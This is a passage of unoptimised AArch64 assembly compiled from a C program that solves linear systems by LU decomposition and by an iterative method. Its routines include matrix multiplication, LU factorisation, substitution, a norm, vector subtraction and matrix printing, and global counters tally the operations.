w9, sxtw #3] str d0, [sp, #32] stur wzr, [x29, #-20] b LBB4_39 LBB4_39: ; Parent Loop BB4_35 Depth=1 ; Parent Loop BB4_37 Depth=2 ; => This Inner Loop Header: Depth=3 ldur w8, [x29, #-20] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB4_42 b LBB4_40 LBB4_40: ; in Loop: Header=BB4_39 Depth=3 ldr x8, [sp, #16] ldur w9, [x29, #-24] ldur w10, [x29, #-12] mul w9, w9, w10 ldur w10, [x29, #-20] add w9, w9, w10 ldr d0, [x8, w9, sxtw #3] ldr d1, [sp, #32] ldr x8, [sp, #16] ldur w9, [x29, #-16] ldur w10, [x29, #-12] mul w9, w9, w10 ldur w10, [x29, #-20] add w9, w9, w10 add x8, x8, w9, sxtw #3 ldr d2, [x8] fmsub d0, d0, d1, d2 str d0, [x8] ldr x8, [sp, #24] ldur w9, [x29, #-24] ldur w10, [x29, #-12] mul w9, w9, w10 ldur w10, [x29, #-20] add w9, w9, w10 ldr d0, [x8, w9, sxtw #3] ldr d1, [sp, #32] ldr x8, [sp, #24] ldur w9, [x29, #-16] ldur w10, [x29, #-12] mul w9, w9, w10 ldur w10, [x29, #-20] add w9, w9, w10 add x8, x8, w9, sxtw #3 ldr d2, [x8] fmsub d0, d0, d1, d2 str d0, [x8] b LBB4_41 LBB4_41: ; in Loop: Header=BB4_39 Depth=3 ldur w8, [x29, #-20] add w8, w8, #1 stur w8, [x29, #-20] b LBB4_39 LBB4_42: ; in Loop: Header=BB4_37 Depth=2 b LBB4_43 LBB4_43: ; in Loop: Header=BB4_37 Depth=2 ldur w8, [x29, #-16] subs w8, w8, #1 stur w8, [x29, #-16] b LBB4_37 LBB4_44: ; in Loop: Header=BB4_35 Depth=1 b LBB4_45 LBB4_45: ; in Loop: Header=BB4_35 Depth=1 ldur w8, [x29, #-24] subs w8, w8, #1 stur w8, [x29, #-24] b LBB4_35 LBB4_46: ldr x0, [sp, #24] ldp x29, x30, [sp, #64] ; 16-byte Folded Reload add sp, sp, #80 ret .cfi_endproc ; -- End function .globl _MatrixMul ; -- Begin function MatrixMul .p2align 2 _MatrixMul: ; @MatrixMul .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] stur x1, [x29, #-16] stur w2, [x29, #-20] ldursw x9, [x29, #-20] mov x8, #8 mul x0, x8, x9 bl _malloc str x0, [sp, #16] str wzr, [sp, #12] b LBB5_1 LBB5_1: ; =>This Loop Header: Depth=1 ; Child Loop BB5_3 Depth 2 ldr w8, [sp, #12] ldur w9, [x29, #-20] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB5_8 b LBB5_2 LBB5_2: ; in Loop: Header=BB5_1 Depth=1 ldr x8, [sp, #16] ldrsw x9, [sp, #12] movi d0, #0000000000000000 str d0, [x8, x9, lsl #3] str wzr, [sp, #8] b LBB5_3 LBB5_3: ; Parent Loop BB5_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #8] ldur w9, [x29, #-20] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB5_6 b LBB5_4 LBB5_4: ; in Loop: Header=BB5_3 Depth=2 ldur x8, [x29, #-8] ldr w9, [sp, #12] ldur w10, [x29, #-20] mul w9, w9, w10 ldr w10, [sp, #8] add w9, w9, w10 ldr d0, [x8, w9, sxtw #3] ldur x8, [x29, #-16] ldrsw x9, [sp, #8] ldr d1, [x8, x9, lsl #3] ldr x8, [sp, #16] ldrsw x9, [sp, #12] add x8, x8, x9, lsl #3 ldr d2, [x8] fmadd d0, d0, d1, d2 str d0, [x8] b LBB5_5 LBB5_5: ; in Loop: Header=BB5_3 Depth=2 ldr w8, [sp, #8] add w8, w8, #1 str w8, [sp, #8] b LBB5_3 LBB5_6: ; in Loop: Header=BB5_1 Depth=1 b LBB5_7 LBB5_7: ; in Loop: Header=BB5_1 Depth=1 ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] b LBB5_1 LBB5_8: ldr x0, [sp, #16] ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _CreateLUMatrix ; -- Begin function CreateLUMatrix .p2align 2 _CreateLUMatrix: ; @CreateLUMatrix .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 adrp x8, _luOps1@GOTPAGE ldr x8, [x8, _luOps1@GOTPAGEOFF] str x8, [sp, #8] ; 8-byte Folded Spill adrp x8, _luOps2@GOTPAGE ldr x8, [x8, _luOps2@GOTPAGEOFF] str x8, [sp, #16] ; 8-byte Folded Spill str x0, [sp, #72] str w1, [sp, #68] str x2, [sp, #56] str x3, [sp, #48] str wzr, [sp, #32] b LBB6_1 LBB6_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #32] ldr w9, [sp, #68] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB6_4 b LBB6_2 LBB6_2: ; in Loop: Header=BB6_1 Depth=1 ldr x9, [sp, #16] ; 8-byte Folded Reload ldr x8, [sp, #72] ldrsw x10, [sp, #32] ldr d0, [x8, x10, lsl #3] ldr x8, [sp, #48] ldr x8, [x8] ldrsw x10, [sp, #32] str d0, [x8, x10, lsl #3] ldr x8, [sp, #72] ldr w10, [sp, #32] ldr w11, [sp, #68] mul w10, w10, w11 ldr d0, [x8, w10, sxtw #3] ldr x8, [sp, #48] ldr x8, [x8] ldr d1, [x8] fdiv d0, d0, d1 ldr x8, [sp, #56] ldr x8, [x8] ldr w10, [sp, #32] ldr w11, [sp, #68] mul w10, w10, w11 str d0, [x8, w10, sxtw #3] ldr w8, [x9] add w8, w8, #1 str w8, [x9] b LBB6_3 LBB6_3: ; in Loop: Header=BB6_1 Depth=1 ldr w8, [sp, #32] add w8, w8, #1 str w8, [sp, #32] b LBB6_1 LBB6_4: mov w8, #1 str w8, [sp, #36] b LBB6_5 LBB6_5: ; =>This Loop Header: Depth=1 ; Child Loop BB6_7 Depth 2 ; Child Loop BB6_9 Depth 3 ; Child Loop BB6_13 Depth 3 ldr w8, [sp, #36] ldr w9, [sp, #68] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB6_20 b LBB6_6 LBB6_6: ; in Loop: Header=BB6_5 Depth=1 ldr w8, [sp, #36] str w8, [sp, #32] b LBB6_7 LBB6_7: ; Parent Loop BB6_5 Depth=1 ; => This Loop Header: Depth=2 ; Child Loop BB6_9 Depth 3 ; Child Loop BB6_13 Depth 3 ldr w8, [sp, #32] ldr w9, [sp, #68] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB6_18 b LBB6_8 LBB6_8: ; in Loop: Header=BB6_7 Depth=2 str wzr, [sp, #28] movi d0, #0000000000000000 str d0, [sp, #40] b LBB6_9 LBB6_9: ; Parent Loop BB6_5 Depth=1 ; Parent Loop BB6_7 Depth=2 ; => This Inner Loop Header: Depth=3 ldr w8, [sp, #28] ldr w9, [sp, #36] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB6_12 b LBB6_10 LBB6_10: ; in Loop: Header=BB6_9 Depth=3 ldr x9, [sp, #16] ; 8-byte Folded Reload ldr x10, [sp, #8] ; 8-byte Folded Reload ldr x8, [sp, #56] ldr x8, [x8] ldr w11, [sp, #36] ldr w12, [sp, #68] mul w11, w11, w12 ldr w12, [sp, #28] add w11, w11, w12 ldr d0, [x8, w11, sxtw #3] ldr x8, [sp, #48] ldr x8, [x8] ldr w11, [sp, #28] ldr w12, [sp, #68] mul w11, w11, w12 ldr w12, [sp, #32] add w11, w11, w12 ldr d1, [x8, w11, sxtw #3] ldr d2, [sp, #40] fmadd d0, d0, d1, d2 str d0, [sp, #40] ldr w8, [x10] add w8, w8, #1 str w8, [x10] ldr w8, [x9] add w8, w8, #1 str w8, [x9] b LBB6_11 LBB6_11: ; in Loop: Header=BB6_9 Depth=3 ldr w8, [sp, #28] add w8, w8, #1 str w8, [sp, #28] b LBB6_9 LBB6_12: ; in Loop: Header=BB6_7 Depth=2 ldr x9, [sp, #8] ; 8-byte Folded Reload ldr x8, [sp, #72] ldr w10, [sp, #36] ldr w11, [sp, #68] mul w10, w10, w11 ldr w11, [sp, #32] add w10, w10, w11 ldr d0, [x8, w10, sxtw #3] ldr d1, [sp, #40] fsub d0, d0, d1 ldr x8, [sp, #48] ldr x8, [x8] ldr w10, [sp, #36] ldr w11, [sp, #68] mul w10, w10, w11 ldr w11, [sp, #32] add w10, w10, w11 str d0, [x8, w10, sxtw #3] ldr w8, [x9] add w8, w8, #1 str w8, [x9] str wzr, [sp, #28] movi d0, #0000000000000000 str d0, [sp, #40] b LBB6_13 LBB6_13: ; Parent Loop BB6_5 Depth=1 ; Parent Loop BB6_7 Depth=2 ; => This Inner Loop Header: Depth=3 ldr w8, [sp, #28] ldr w9, [sp, #36] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB6_16 b LBB6_14 LBB6_14: ; in Loop: Header=BB6_13 Depth=3 ldr x9, [sp, #16] ; 8-byte Folded Reload ldr x10, [sp, #8] ; 8-byte Folded Reload ldr x8, [sp, #56] ldr x8, [x8] ldr w11, [sp, #32] ldr w12, [sp, #68] mul w11, w11, w12 ldr w12, [sp, #28] add w11, w11, w12 ldr d0, [x8, w11, sxtw #3] ldr x8, [sp, #48] ldr x8, [x8] ldr w11, [sp, #28] ldr w12, [sp, #68] mul w11, w11, w12 ldr w12, [sp, #36] add w11, w11, w12 ldr d1, [x8, w11, sxtw #3] ldr d2, [sp, #40] fmadd d0, d0, d1, d2 str d0, [sp, #40] ldr w8, [x10] add w8, w8, #1 str w8, [x10] ldr w8, [x9] add w8, w8, #1 str w8, [x9] b LBB6_15 LBB6_15: ; in Loop: Header=BB6_13 Depth=3 ldr w8, [sp, #28] add w8, w8, #1 str w8, [sp, #28] b LBB6_13 LBB6_16: ; in Loop: Header=BB6_7 Depth=2 ldr x9, [sp, #16] ; 8-byte Folded Reload ldr x8, [sp, #72] ldr w10, [sp, #32] ldr w11, [sp, #68] mul w10, w10, w11 ldr w11, [sp, #36] add w10, w10, w11 ldr d0, [x8, w10, sxtw #3] ldr d1, [sp, #40] fsub d0, d0, d1 ldr x8, [sp, #48] ldr x8, [x8] ldr w10, [sp, #36] ldr w11, [sp, #68] mul w10, w10, w11 ldr w11, [sp, #36] add w10, w10, w11 ldr d1, [x8, w10, sxtw #3] fdiv d0, d0, d1 ldr x8, [sp, #56] ldr x8, [x8] ldr w10, [sp, #32] ldr w11, [sp, #68] mul w10, w10, w11 ldr w11, [sp, #36] add w10, w10, w11 str d0, [x8, w10, sxtw #3] ldr w8, [x9] add w8, w8, #1 str w8, [x9] b LBB6_17 LBB6_17: ; in Loop: Header=BB6_7 Depth=2 ldr w8, [sp, #32] add w8, w8, #1 str w8, [sp, #32] b LBB6_7 LBB6_18: ; in Loop: Header=BB6_5 Depth=1 b LBB6_19 LBB6_19: ; in Loop: Header=BB6_5 Depth=1 ldr w8, [sp, #36] add w8, w8, #1 str w8, [sp, #36] b LBB6_5 LBB6_20: add sp, sp, #80 ret .cfi_endproc ; -- End function .globl _Solution ; -- Begin function Solution .p2align 2 _Solution: ; @Solution .cfi_startproc ; %bb.0: sub sp, sp, #112 .cfi_def_cfa_offset 112 stp x29, x30, [sp, #96] ; 16-byte Folded Spill add x29, sp, #96 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _luOps1@GOTPAGE ldr x8, [x8, _luOps1@GOTPAGEOFF] str x8, [sp] ; 8-byte Folded Spill adrp x8, _luOps2@GOTPAGE ldr x8, [x8, _luOps2@GOTPAGEOFF] str x8, [sp, #8] ; 8-byte Folded Spill stur x0, [x29, #-8] stur x1, [x29, #-16] stur w2, [x29, #-20] stur x3, [x29, #-32] ldursw x9, [x29, #-20] mov x8, #8 str x8, [sp, #16] ; 8-byte Folded Spill mul x0, x8, x9 bl _malloc ldr x8, [sp, #16] ; 8-byte Folded Reload stur x0, [x29, #-40] ldursw x9, [x29, #-20] mul x0, x8, x9 bl _malloc str x0, [sp, #48] mov w8, #11 str w8, [sp, #28] str wzr, [sp, #36] b LBB7_1 LBB7_1: ; =>This Loop Header: Depth=1 ; Child Loop BB7_3 Depth 2 ldr w8, [sp, #36] ldur w9, [x29, #-20] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB7_8 b LBB7_2 LBB7_2: ; in Loop: Header=BB7_1 Depth=1 str wzr, [sp, #32] movi d0, #0000000000000000 str d0, [sp, #40] b LBB7_3 LBB7_3: ; Parent Loop BB7_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #32] ldr w9, [sp, #36] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB7_6 b LBB7_4 LBB7_4: ; in Loop: Header=BB7_3 Depth=2 ldr x9, [sp, #8] ; 8-byte Folded Reload ldr x10, [sp] ; 8-byte Folded Reload ldur x8, [x29, #-8] ldr w11, [sp, #36] ldur w12, [x29, #-20] mul w11, w11, w12 ldr w12, [sp, #32] add w11, w11, w12 ldr d0, [x8, w11, sxtw #3] ldur x8, [x29, #-40] ldrsw x11, [sp, #32] ldr d1, [x8, x11, lsl #3] ldr d2, [sp, #40] fmadd d0, d0, d1, d2 str d0, [sp, #40] ldr w8, [x10] add w8, w8, #1 str w8, [x10] ldr w8, [x9] add w8, w8, #1 str w8, [x9] b LBB7_5 LBB7_5: ; in Loop: Header=BB7_3 Depth=2 ldr w8, [sp, #32] add w8, w8, #1 str w8, [sp, #32] b LBB7_3 LBB7_6: ; in Loop: Header=BB7_1 Depth=1 ldr x9, [sp] ; 8-byte Folded Reload ldur x8, [x29, #-32] ldrsw x10, [sp, #36] ldr d0, [x8, x10, lsl #3] ldr d1, [sp, #40] fsub d0, d0, d1 ldur x8, [x29, #-40] ldrsw x10, [sp, #36] str d0, [x8, x10, lsl #3] ldr w8, [x9] add w8, w8, #1 str w8, [x9] b LBB7_7 LBB7_7: ; in Loop: Header=BB7_1 Depth=1 ldr w8, [sp, #36] add w8, w8, #1 str w8, [sp, #36] b LBB7_1 LBB7_8: ldr w8, [sp, #28] str w8, [sp, #36] b LBB7_9 LBB7_9: ; =>This Loop Header: Depth=1 ; Child Loop BB7_11 Depth 2 ldr w8, [sp, #36] subs w8, w8, #0 cset w8, lt tbnz w8, #0, LBB7_16 b LBB7_10 LBB7_10: ; in Loop: Header=BB7_9 Depth=1 ldr w8, [sp, #36] add w8, w8, #1 str w8, [sp, #32] movi d0, #0000000000000000 str d0, [sp, #40] b LBB7_11 LBB7_11: ; Parent Loop BB7_9 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #32] ldur w9, [x29, #-20] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB7_14 b LBB7_12 LBB7_12: ; in Loop: Header=BB7_11 Depth=2 ldr x9, [sp, #8] ; 8-byte Folded Reload ldr x10, [sp] ; 8-byte Folded Reload ldur x8, [x29, #-16] ldr w11, [sp, #36] ldur w12, [x29, #-20] mul w11, w11, w12 ldr w12, [sp, #32] add w11, w11, w12 ldr d0, [x8, w11, sxtw #3] ldr x8, [sp, #48] ldrsw x11, [sp, #32] ldr d1, [x8, x11, lsl #3] ldr d2, [sp, #40] fmadd d0, d0, d1, d2 str d0, [sp, #40] ldr w8, [x10] add w8, w8, #1 str w8, [x10] ldr w8, [x9] add w8, w8, #1 str w8, [x9] b LBB7_13 LBB7_13: ; in Loop: Header=BB7_11 Depth=2 ldr w8, [sp, #32] add w8, w8, #1 str w8, [sp, #32] b LBB7_11 LBB7_14: ; in Loop: Header=BB7_9 Depth=1 ldr x9, [sp, #8] ; 8-byte Folded Reload ldr x10, [sp] ; 8-byte Folded Reload ldur x8, [x29, #-40] ldrsw x11, [sp, #36] ldr d0, [x8, x11, lsl #3] ldr d1, [sp, #40] fsub d0, d0, d1 ldur x8, [x29, #-16] ldr w11, [sp, #36] ldur w12, [x29, #-20] mul w11, w11, w12 ldr w12, [sp, #36] add w11, w11, w12 ldr d1, [x8, w11, sxtw #3] fdiv d0, d0, d1 ldr x8, [sp, #48] ldrsw x11, [sp, #36] str d0, [x8, x11, lsl #3] ldr w8, [x10] add w8, w8, #1 str w8, [x10] ldr w8, [x9] add w8, w8, #1 str w8, [x9] b LBB7_15 LBB7_15: ; in Loop: Header=BB7_9 Depth=1 ldr w8, [sp, #36] subs w8, w8, #1 str w8, [sp, #36] b LBB7_9 LBB7_16: ldur x0, [x29, #-40] bl _free ldr x0, [sp, #48] ldp x29, x30, [sp, #96] ; 16-byte Folded Reload add sp, sp, #112 ret .cfi_endproc ; -- End function .globl _CreateAlphaMatrix ; -- Begin function CreateAlphaMatrix .p2align 2 _CreateAlphaMatrix: ; @CreateAlphaMatrix .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] stur w1, [x29, #-12] ldursw x9, [x29, #-12] mov x8, #8 mul x8, x8, x9 ldursw x9, [x29, #-12] mul x0, x8, x9 bl _malloc str x0, [sp, #8] str wzr, [sp, #4] b LBB8_1 LBB8_1: ; =>This Loop Header: Depth=1 ; Child Loop BB8_3 Depth 2 ldr w8, [sp, #4] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB8_11 b LBB8_2 LBB8_2: ; in Loop: Header=BB8_1 Depth=1 str wzr, [sp] b LBB8_3 LBB8_3: ; Parent Loop BB8_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB8_9 b LBB8_4 LBB8_4: ; in Loop: Header=BB8_3 Depth=2 ldr w8, [sp] ldr w9, [sp, #4] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB8_6 b LBB8_5 LBB8_5: ; in Loop: Header=BB8_3 Depth=2 ldr x8, [sp, #8] ldr w9, [sp, #4] ldur w10, [x29, #-12] mul w9, w9, w10 ldr w10, [sp] add w9, w9, w10 movi d0, #0000000000000000 str d0, [x8, w9, sxtw #3] b LBB8_7 LBB8_6: ; in Loop: Header=BB8_3 Depth=2 ldur x8, [x29, #-8] ldr w9, [sp, #4] ldur w10, [x29, #-12] mul w9, w9, w10 ldr w10, [sp] add w9, w9, w10 ldr d0, [x8, w9, sxtw #3] ldur x8, [x29, #-8] ldr w9, [sp, #4] ldur w10, [x29, #-12] mul w9, w9, w10 ldr w10, [sp, #4] add w9, w9, w10 ldr d1, [x8, w9, sxtw #3] fdiv d0, d0, d1 fmov d1, #-1.00000000 fmul d0, d0, d1 ldr x8, [sp, #8] ldr w9, [sp, #4] ldur w10, [x29, #-12] mul w9, w9, w10 ldr w10, [sp] add w9, w9, w10 str d0, [x8, w9, sxtw #3] adrp x9, _itOps2@GOTPAGE ldr x9, [x9, _itOps2@GOTPAGEOFF] ldr w8, [x9] add w8, w8, #1 str w8, [x9] b LBB8_7 LBB8_7: ; in Loop: Header=BB8_3 Depth=2 b LBB8_8 LBB8_8: ; in Loop: Header=BB8_3 Depth=2 ldr w8, [sp] add w8, w8, #1 str w8, [sp] b LBB8_3 LBB8_9: ; in Loop: Header=BB8_1 Depth=1 b LBB8_10 LBB8_10: ; in Loop: Header=BB8_1 Depth=1 ldr w8, [sp, #4] add w8, w8, #1 str w8, [sp, #4] b LBB8_1 LBB8_11: ldr x0, [sp, #8] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _CreateBetaVector ; -- Begin function CreateBetaVector .p2align 2 _CreateBetaVector: ; @CreateBetaVector .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] stur x1, [x29, #-16] stur w2, [x29, #-20] ldursw x9, [x29, #-20] mov x8, #8 mul x0, x8, x9 bl _malloc str x0, [sp, #16] str wzr, [sp, #12] b LBB9_1 LBB9_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #12] ldur w9, [x29, #-20] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB9_4 b LBB9_2 LBB9_2: ; in Loop: Header=BB9_1 Depth=1 ldur x8, [x29, #-8] ldrsw x9, [sp, #12] ldr d0, [x8, x9, lsl #3] ldur x8, [x29, #-16] ldr w9, [sp, #12] ldur w10, [x29, #-20] mul w9, w9, w10 ldr w10, [sp, #12] add w9, w9, w10 ldr d1, [x8, w9, sxtw #3] fdiv d0, d0, d1 ldr x8, [sp, #16] ldrsw x9, [sp, #12] str d0, [x8, x9, lsl #3] adrp x9, _itOps2@GOTPAGE ldr x9, [x9, _itOps2@GOTPAGEOFF] ldr w8, [x9] add w8, w8, #1 str w8, [x9] b LBB9_3 LBB9_3: ; in Loop: Header=BB9_1 Depth=1 ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] b LBB9_1 LBB9_4: ldr x0, [sp, #16] ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _CreateXVector ; -- Begin function CreateXVector .p2align 2 _CreateXVector: ; @CreateXVector .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] stur x1, [x29, #-16] str x2, [sp, #24] str w3, [sp, #20] ldrsw x9, [sp, #20] mov x8, #8 mul x0, x8, x9 bl _malloc str x0, [sp, #8] str wzr, [sp, #4] b LBB10_1 LBB10_1: ; =>This Loop Header: Depth=1 ; Child Loop BB10_3 Depth 2 ldr w8, [sp, #4] ldr w9, [sp, #20] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB10_8 b LBB10_2 LBB10_2: ; in Loop: Header=BB10_1 Depth=1 ldur x8, [x29, #-8] ldrsw x9, [sp, #4] ldr d0, [x8, x9, lsl #3] ldr x8, [sp, #8] ldrsw x9, [sp, #4] str d0, [x8, x9, lsl #3] str wzr, [sp] b LBB10_3 LBB10_3: ; Parent Loop BB10_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp] ldr w9, [sp, #20] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB10_6 b LBB10_4 LBB10_4: ; in Loop: Header=BB10_3 Depth=2 ldur x8, [x29, #-16] ldr w9, [sp, #4] ldr w10, [sp, #20] mul w9, w9, w10 ldr w10, [sp] add w9, w9, w10 ldr d0, [x8, w9, sxtw #3] ldr x8, [sp, #24] ldrsw x9, [sp] ldr d1, [x8, x9, lsl #3] ldr x8, [sp, #8] ldrsw x9, [sp, #4] add x8, x8, x9, lsl #3 ldr d2, [x8] fmadd d0, d0, d1, d2 str d0, [x8] adrp x9, _itOps1@GOTPAGE ldr x9, [x9, _itOps1@GOTPAGEOFF] ldr w8, [x9] add w8, w8, #1 str w8, [x9] adrp x9, _itOps2@GOTPAGE ldr x9, [x9, _itOps2@GOTPAGEOFF] ldr w8, [x9] add w8, w8, #1 str w8, [x9] b LBB10_5 LBB10_5: ; in Loop: Header=BB10_3 Depth=2 ldr w8, [sp] add w8, w8, #1 str w8, [sp] b LBB10_3 LBB10_6: ; in Loop: Header=BB10_1 Depth=1 b LBB10_7 LBB10_7: ; in Loop: Header=BB10_1 Depth=1 ldr w8, [sp, #4] add w8, w8, #1 str w8, [sp, #4] b LBB10_1 LBB10_8: ldr x0, [sp, #8] ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _FindNorm ; -- Begin function FindNorm .p2align 2 _FindNorm: ; @FindNorm .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 str x0, [sp, #24] str w1, [sp, #20] movi d0, #0000000000000000 str d0, [sp, #8] str wzr, [sp, #16] b LBB11_1 LBB11_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #16] ldr w9, [sp, #20] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB11_6 b LBB11_2 LBB11_2: ; in Loop: Header=BB11_1 Depth=1 ldr x8, [sp, #24] ldrsw x9, [sp, #16] ldr d0, [x8, x9, lsl #3] ldr d1, [sp, #8] fcmp d0, d1 cset w8, le tbnz w8, #0, LBB11_4 b LBB11_3 LBB11_3: ; in Loop: Header=BB11_1 Depth=1 ldr x8, [sp, #24] ldrsw x9, [sp, #16] ldr d0, [x8, x9, lsl #3] str d0, [sp, #8] b LBB11_4 LBB11_4: ; in Loop: Header=BB11_1 Depth=1 b LBB11_5 LBB11_5: ; in Loop: Header=BB11_1 Depth=1 ldr w8, [sp, #16] add w8, w8, #1 str w8, [sp, #16] b LBB11_1 LBB11_6: ldr d0, [sp, #8] add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _VectSub ; -- Begin function VectSub .p2align 2 _VectSub: ; @VectSub .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] str x1, [sp, #16] str w2, [sp, #12] ldrsw x9, [sp, #12] mov x8, #8 mul x0, x8, x9 bl _malloc str x0, [sp] str wzr, [sp, #8] b LBB12_1 LBB12_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #8] ldr w9, [sp, #12] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB12_4 b LBB12_2 LBB12_2: ; in Loop: Header=BB12_1 Depth=1 ldur x8, [x29, #-8] ldrsw x9, [sp, #8] ldr d0, [x8, x9, lsl #3] ldr x8, [sp, #16] ldrsw x9, [sp, #8] ldr d1, [x8, x9, lsl #3] fabd d0, d0, d1 ldr x8, [sp] ldrsw x9, [sp, #8] str d0, [x8, x9, lsl #3] b LBB12_3 LBB12_3: ; in Loop: Header=BB12_1 Depth=1 ldr w8, [sp, #8] add w8, w8, #1 str w8, [sp, #8] b LBB12_1 LBB12_4: ldr x0, [sp] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _PrintMatrix ; -- Begin function PrintMatrix .p2align 2 _PrintMatrix: ; @PrintMatrix .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] stur x1, [x29, #-16] stur w2, [x29, #-20] str wzr, [sp, #24] b LBB13_1 LBB13_1: ; =>This Loop Header: Depth=1 ; Child Loop BB13_3 Depth 2 ldr w8, [sp, #24] ldur w9, [x29, #-20] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB13_8 b LBB13_2 LBB13_2: ; in Loop: Header=BB13_1 Depth=1 str wzr, [sp, #20] b LBB13_3 LBB13_3: ; Parent Loop BB13_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #20] ldur w9, [x29, #-20] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB13_6 b LBB13_4 LBB13_4: ; in Loop: Header=BB13_3 Depth=2 ldur x0, [x29, #-8] ldur x8, [x29, #-16] ldr w9, [sp, #24] ldur w10, [x29, #-20] mul w9, w9, w10 ldr w10, [sp, #20] add w9, w9, w10 ldr d0, [x8, w9, sxtw #3] mov x8, sp str d0, [x8] adrp x1, l_.str@PAGE add x1, x1, l_.str@PAGEOFF bl _fprintf b LBB13_5 LBB13_5: ; in Loop: Header=BB13_3 Depth=2 ldr w8, [sp, #20] add w8, w8, #1 str w8, [sp, #20] b LBB13_3 LBB13_6: ; in Loop: Header=BB13_1 Depth=1 ldur x0, [x29, #-8] adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _fprintf b LBB13_7 LBB13_7: ; in Loop: Header=BB13_1 Depth=1 ldr w8, [sp, #24] add w8, w8, #1 str w8, [sp, #24] b LBB13_1 LBB13_8: ldur x0, [x29, #-8] adrp x1, l_.str.2@PAGE add x1, x1, l_.str.2@PAGEOFF bl _fprintf ldur x0, [x29, #-8] mov x1, #0 mov w2, #0 bl _fseek ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .section __TEXT,__literal8,8byte_literals .p2align 3 ; -- Begin function main lCPI14_0: .quad 0x40c3880000000000 ; double 1.0E+4 lCPI14_1: .quad 0x3d3c25c268497682 ; double 1.0E-13 lCPI14_2: .quad 0x3d06849b86a12b9b ; double 9.9999999999999999E-15 .section __TEXT,__text,regular,pure_instructions .globl _main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #336 .cfi_def_cfa_offset 336 stp x28, x27, [sp, #304] ; 16-byte Folded Spill stp x29, x30, [sp, #320] ; 16-byte Folded Spill add x29, sp, #320 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 .cfi_offset w27, -24 .cfi_offset w28, -32 adrp x8, _luOps1@GOTPAGE ldr x8, [x8, _luOps1@GOTPAGEOFF] str x8, [sp, 